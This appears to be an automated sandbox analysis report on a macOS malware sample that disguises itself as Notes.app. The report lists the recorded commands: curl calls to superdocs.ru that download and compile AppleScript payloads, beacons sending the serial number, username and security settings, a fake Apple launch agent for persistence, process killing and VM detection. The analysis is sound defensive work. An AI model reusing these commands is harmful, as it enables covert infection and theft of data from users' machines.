Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sysd.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: listing - com.utils.core.sysd.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/notes_app.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.dock.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.dock.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.dock.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.dock.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.dock.app' &> /dev/null & echo $!	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.dock.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: notes_app - com.metal.core.dock.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/contacts.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.filesystem.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.filesystem.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.filesystem.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.filesystem.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.filesystem.app' &> /dev/null & echo $!	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.filesystem.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: contacts - com.utils.core.filesystem.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/telegram.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.cloudservices.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.cloudservices.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.cloudservices.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.cloudservices.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.cloudservices.app' &> /dev/null & echo $!	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.metal.core.cloudservices.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: telegram - com.metal.core.cloudservices.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/telegram_lite.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.launchservices.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c plutil -replace LSUIElement -bool YES '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.launchservices.app'/Contents/Info.plist	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.launchservices.app/Contents/Resources/applet.icns' https://superdocs.ru/agent/bin/icons/Empty.icns	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c codesign --force --deep -s - '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.launchservices.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c open -na '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.launchservices.app' &> /dev/null & echo $!	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c basename '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.launchservices.app'	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'mapping: telegram_lite - com.utils.core.launchservices.app' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'delay 300s before browsers' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1038)	Shell command executed: sh -c whoami	Jump to behavior
Source: /bin/sh (PID: 1039)	Shell command executed: sh -c ping -o -t 3 superdocs.ru	Jump to behavior
Source: /bin/sh (PID: 1040)	Shell command executed: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1043)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1044)	Shell command executed: sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed	Jump to behavior
Source: /bin/sh (PID: 1048)	Shell command executed: sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist \| grep 'https' -b3 \|awk 'NR==3 {split($4, arr, '\'') print arr[2]}') \|\| echo 'com.apple.safari'	Jump to behavior
Source: /bin/sh (PID: 1053)	Shell command executed: sh -c defaults read loginwindow SystemVersionStampAsString	Jump to behavior
Source: /bin/sh (PID: 1054)	Shell command executed: sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString	Jump to behavior
Source: /bin/sh (PID: 1056)	Shell command executed: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1059)	Shell command executed: sh -c defaults read /Library/Preferences/com.apple.alf globalstate	Jump to behavior
Source: /bin/sh (PID: 1060)	Shell command executed: sh -c csrutil status \| grep -q enabled && echo 1 \|\| echo 0	Jump to behavior
Source: /bin/sh (PID: 1063)	Shell command executed: sh -c sysctl -n machdep.cpu.brand_string	Jump to behavior
Source: /bin/sh (PID: 1064)	Shell command executed: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1067)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1068)	Shell command executed: sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9	Jump to behavior
Source: /bin/sh (PID: 1074)	Shell command executed: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain	Jump to behavior
Source: /bin/sh (PID: 1075)	Shell command executed: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1078)	Shell command executed: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1079)	Shell command executed: sh -c echo ~/Library/Caches/GitServices/.rep	Jump to behavior
Source: /bin/sh (PID: 1080)	Shell command executed: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' \|\| echo 9999999999	Jump to behavior
Source: /bin/sh (PID: 1082)	Shell command executed: sh -c date +'%s'	Jump to behavior
Source: /bin/sh (PID: 1083)	Shell command executed: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' \|\| echo '0'	Jump to behavior
Source: /bin/sh (PID: 1084)	Shell command executed: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'	Jump to behavior
Source: /bin/sh (PID: 1085)	Shell command executed: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'	Jump to behavior

Source: /bin/bash (PID: 991)	Touch executable: /usr/bin/touch -> touch /test.tmp	Jump to behavior
Source: /bin/bash (PID: 1003)	Touch executable: /usr/bin/touch -> touch /test2.tmp	Jump to behavior
Source: /bin/bash (PID: 1004)	Touch executable: /usr/bin/touch -> touch /test3.tmp	Jump to behavior
Source: /bin/bash (PID: 1018)	Touch executable: /usr/bin/touch -> touch /test4.tmp	Jump to behavior
Source: /bin/bash (PID: 1024)	Touch executable: /usr/bin/touch -> touch /test5.tmp	Jump to behavior
Source: /bin/bash (PID: 1025)	Touch executable: /usr/bin/touch -> touch /test6.tmp	Jump to behavior
Source: /bin/bash (PID: 1046)	Touch executable: /usr/bin/touch -> touch /Users/pedro/Library/Caches/GitServices/.ed	Jump to behavior

Source: /bin/bash (PID: 1005)	Plutil executable: /usr/bin/plutil plutil -replace LSUIElement -bool YES /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist			Jump to behavior
Source: /bin/bash (PID: 1050)	Plutil executable: /usr/bin/plutil plutil -p /Users/pedro/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist			Jump to behavior

Source: /bin/bash (PID: 1069)

Ps executable: /bin/ps -> ps aux

Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns
Source: /bin/cp (PID: 1007)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns			Jump to dropped file

Source: /bin/bash (PID: 1063)

Sysctl executable: /usr/sbin/sysctl -> sysctl -n machdep.cpu.brand_string

Jump to behavior

Source: /bin/bash (PID: 1019)

Launch agent/daemon loaded: launchctl load -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Source: /bin/bash (PID: 1016)

Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file created: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Source: /bin/bash (PID: 957)	Hidden File created: /Users/pedro/Library/Caches/GitServices/.plist	Jump to behavior
Source: /bin/bash (PID: 957)	Hidden File created: /Users/pedro/Library/Caches/GitServices/.report	Jump to behavior
Source: /bin/bash (PID: 957)	Hidden File created: /Users/pedro/Library/Caches/GitServices/.domain	Jump to behavior
Source: /usr/bin/touch (PID: 1046)	Hidden File created: /Users/pedro/Library/Caches/GitServices/.ed	Jump to behavior

Source: /bin/bash (PID: 983)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Notes.app	Jump to behavior
Source: /bin/bash (PID: 984)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Containers	Jump to behavior
Source: /bin/bash (PID: 985)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Notes.app	Jump to behavior
Source: /bin/bash (PID: 986)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Containers	Jump to behavior
Source: /bin/bash (PID: 987)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app	Jump to behavior
Source: /bin/bash (PID: 988)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Containers	Jump to behavior
Source: /bin/bash (PID: 989)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Notes.app	Jump to behavior
Source: /bin/bash (PID: 990)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Containers	Jump to behavior
Source: /bin/bash (PID: 992)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist	Jump to behavior
Source: /bin/bash (PID: 993)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist	Jump to behavior
Source: /bin/bash (PID: 994)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist	Jump to behavior
Source: /bin/bash (PID: 995)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist	Jump to behavior
Source: /bin/bash (PID: 996)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist	Jump to behavior
Source: /bin/bash (PID: 997)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist	Jump to behavior
Source: /bin/bash (PID: 998)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist	Jump to behavior
Source: /bin/bash (PID: 999)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist	Jump to behavior
Source: /bin/bash (PID: 1006)	Rm executable: /bin/rm -> rm -f /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns	Jump to behavior
Source: /bin/bash (PID: 1030)	Rm executable: /bin/rm -> rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers	Jump to behavior

Source: /bin/sh (PID: 1028)	Shell process: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'	Jump to behavior
Source: /bin/sh (PID: 1029)	Shell process: sh -c ping -o -t 3 superdocs.ru	Jump to behavior
Source: /bin/sh (PID: 1030)	Shell process: sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'	Jump to behavior
Source: /bin/sh (PID: 1031)	Shell process: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'	Jump to behavior
Source: /bin/sh (PID: 1032)	Shell process: sh -c whoami	Jump to behavior
Source: /bin/sh (PID: 1033)	Shell process: sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'	Jump to behavior
Source: /bin/sh (PID: 1036)	Shell process: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1	Jump to behavior
Source: /bin/sh (PID: 1038)	Shell process: sh -c whoami	Jump to behavior
Source: /bin/sh (PID: 1039)	Shell process: sh -c ping -o -t 3 superdocs.ru	Jump to behavior
Source: /bin/sh (PID: 1040)	Shell process: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1043)	Shell process: sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1044)	Shell process: sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed	Jump to behavior
Source: /bin/sh (PID: 1048)	Shell process: sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist \| grep 'https' -b3 \|awk 'NR==3 {split($4, arr, '\'') print arr[2]}') \|\| echo 'com.apple.safari'	Jump to behavior
Source: /bin/sh (PID: 1053)	Shell process: sh -c defaults read loginwindow SystemVersionStampAsString	Jump to behavior
Source: /bin/sh (PID: 1054)	Shell process: sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString	Jump to behavior
Source: /bin/sh (PID: 1056)	Shell process: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1059)	Shell process: sh -c defaults read /Library/Preferences/com.apple.alf globalstate	Jump to behavior
Source: /bin/sh (PID: 1060)	Shell process: sh -c csrutil status \| grep -q enabled && echo 1 \|\| echo 0	Jump to behavior
Source: /bin/sh (PID: 1063)	Shell process: sh -c sysctl -n machdep.cpu.brand_string	Jump to behavior
Source: /bin/sh (PID: 1064)	Shell process: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1067)	Shell process: sh -c curl -k -s --connect-timeout 14 -d 'MacOS version: 12.5, en_CH. Serial: C07GV0KZPJH8. Firewall: 0. SIP: 0, Safari: 15.6, CPU: Intel(R) Core(TM) i5-8500B CPU @ 3.00GHz Default browser: com.apple.safari' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1068)	Shell process: sh -c ps aux \| grep -E 'com.apple.net\|com.utils.core\|com.metal.core\|agentde\|canaryde\|operade\|speedde\|edegede\|firefoxde\|yandexde\|avatarde\|bravede' \| grep -v grep \| awk '{print $2}' \| xargs kill -9	Jump to behavior
Source: /bin/sh (PID: 1074)	Shell process: sh -c echo 'superdocs.ru' > ~/Library/Caches/GitServices/.domain	Jump to behavior
Source: /bin/sh (PID: 1075)	Shell process: sh -c ioreg -c IOPlatformExpertDevice -d 2 \| awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'	Jump to behavior
Source: /bin/sh (PID: 1078)	Shell process: sh -c curl -k -s --connect-timeout 14 -d 'updated .domain with superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l	Jump to behavior
Source: /bin/sh (PID: 1079)	Shell process: sh -c echo ~/Library/Caches/GitServices/.rep	Jump to behavior
Source: /bin/sh (PID: 1080)	Shell process: sh -c date -r '/Users/pedro/Library/Caches/GitServices/.rep' +'%s' \|\| echo 9999999999	Jump to behavior
Source: /bin/sh (PID: 1082)	Shell process: sh -c date +'%s'	Jump to behavior
Source: /bin/sh (PID: 1083)	Shell process: sh -c [ -d /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/ ] && echo '1' \|\| echo '0'	Jump to behavior
Source: /bin/sh (PID: 1084)	Shell process: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/'	Jump to behavior
Source: /bin/sh (PID: 1085)	Shell process: sh -c curl -sk -d 'user=pedro' https://superdocs.ru/agent/scripts/remove_old.applescript \| osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/com.utils.core.sound.app'	Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet			Jump to dropped file
Source: /usr/bin/codesign (PID: 1002)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet.cstemp			Jump to dropped file

Source: /bin/bash (PID: 1042)	Awk executable: /usr/bin/awk -> awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior
Source: /bin/bash (PID: 1052)	Awk executable: /usr/bin/awk -> awk NR==3 {split($4, arr, '\'') print arr[2]}	Jump to behavior
Source: /bin/bash (PID: 1058)	Awk executable: /usr/bin/awk -> awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior
Source: /bin/bash (PID: 1066)	Awk executable: /usr/bin/awk -> awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior
Source: /bin/bash (PID: 1072)	Awk executable: /usr/bin/awk -> awk {print $2}	Jump to behavior
Source: /bin/bash (PID: 1077)	Awk executable: /usr/bin/awk -> awk -F' /IOPlatformSerialNumber/{print $(NF-1)}	Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	XML plist file created: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist
Source: /usr/bin/codesign (PID: 1002)	XML plist file created: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/_CodeSignature/CodeResources	Jump to dropped file
Source: /usr/bin/plutil (PID: 1005)	XML plist file created: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist	Jump to dropped file
Source: /bin/bash (PID: 1016)	XML plist file created: /private/var/tmp/sh-thd-4984109211	Jump to dropped file
Source: /bin/cat (PID: 1016)	XML plist file created: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist	Jump to dropped file

Source: /bin/cp (PID: 1007)

Icon File created: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

Jump to behavior

Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)

AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Jump to behavior

Source: /usr/bin/osacompile (PID: 1001)	Random device file read: /dev/random	Jump to behavior
Source: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet (PID: 1023)	Random device file read: /dev/random	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Random device file read: /dev/random	Jump to behavior
Source: /usr/bin/osacompile (PID: 1035)	Random device file read: /dev/random	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Random device file read: /dev/random	Jump to behavior

Source: /bin/bash (PID: 1016)

Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Source: /bin/bash (PID: 1016)

Launch agent created File created: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Creates launch services redirecting its stdout/stderr to /dev/null (probably to hide errors)

Source: /bin/bash (PID: 1016)

Launch agent/daemon created with StandardOutPath/StandardErrorPath, file created: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Written Apple script contain uncommon file extension (probably to disguise the script)

Source: /usr/bin/osacompile (PID: 1001)	Uncommon extension: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/main.scpt			Jump to dropped file
Source: /usr/bin/osacompile (PID: 1035)	Uncommon extension: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a			Jump to dropped file

Sets the property list key LSUIElement for running apps in the background without appearing in the Dock

Source: /bin/bash (PID: 1005)

Plutil executable with LSUIElement: /usr/bin/plutil plutil -replace LSUIElement -bool YES /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist

Jump to behavior

Copies icons from applications possibly to disguise malicious intentions

Source: /bin/bash (PID: 1007)

Copies icon files from applications dir: /bin/cp -> cp -f /System/Applications/Notes.app/Contents/Resources/AppIcon.icns /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

Jump to behavior

Writes Mach-O files to disk with suspicious names (probably to obfuscate its intention)

Source: /usr/bin/osacompile (PID: 1001)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet -> with keyword 'Notes'			Jump to dropped file
Source: /usr/bin/codesign (PID: 1002)	File written: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet.cstemp -> with keyword 'Notes'			Jump to dropped file

Source: /usr/bin/osacompile (PID: 1001)	Reads from a resource fork: /usr/bin/osacompile/..namedfork/rsrc	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrc	Jump to behavior
Source: /usr/bin/osascript (PID: 1028)	Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrc	Jump to behavior
Source: /usr/bin/osacompile (PID: 1035)	Reads from a resource fork: /usr/bin/osacompile/..namedfork/rsrc	Jump to behavior
Source: /usr/bin/osascript (PID: 1037)	Reads from a resource fork: /usr/bin/osascript/..namedfork/rsrc	Jump to behavior

Source: exec.2430808

Submission file: section __data with 7.9861 entropy (max. 8.0)

Source: /bin/bash (PID: 1016)

Launch agent created File created: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

Jump to behavior

Malware Analysis System Evasion

Likely queries the I/O Kit registry to detect VMs by querying the "IOPlatformExpertDevice" class

Source: /bin/bash (PID: 1041)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior
Source: /bin/bash (PID: 1057)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior
Source: /bin/bash (PID: 1065)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior
Source: /bin/bash (PID: 1076)	IOreg executable: /usr/sbin/ioreg ioreg -c IOPlatformExpertDevice -d 2	Jump to behavior

